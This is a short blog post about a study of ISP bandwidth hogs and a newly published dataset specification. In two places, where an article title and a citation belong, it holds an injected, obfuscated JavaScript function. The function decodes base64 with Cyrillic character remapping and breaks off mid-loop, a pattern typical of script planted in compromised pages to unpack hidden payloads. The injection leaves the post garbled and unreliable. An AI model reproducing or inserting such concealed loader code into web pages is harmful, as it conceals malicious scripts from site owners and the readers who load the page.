Last week I wrote a twin piece with my fellow blogger Herman Wagter regarding bandwidth hogs entitled "function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa
This piece got quite a bit of attention (see function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa
As promised the dataset specification is now made public. I believe that collecting and aggregating the data in this way will make it possible to answer the question, but I am open to suggestions on how to improve the dataset as long as it stays realistic (both in terms of scope of the dataset and of ability of ISPs to produce said data).
For what it's worth, I also intend to publish a light-hearted piece on the impact this has had on my blog readership and on the nature of comments posted to this piece this week-end. Stay tuned!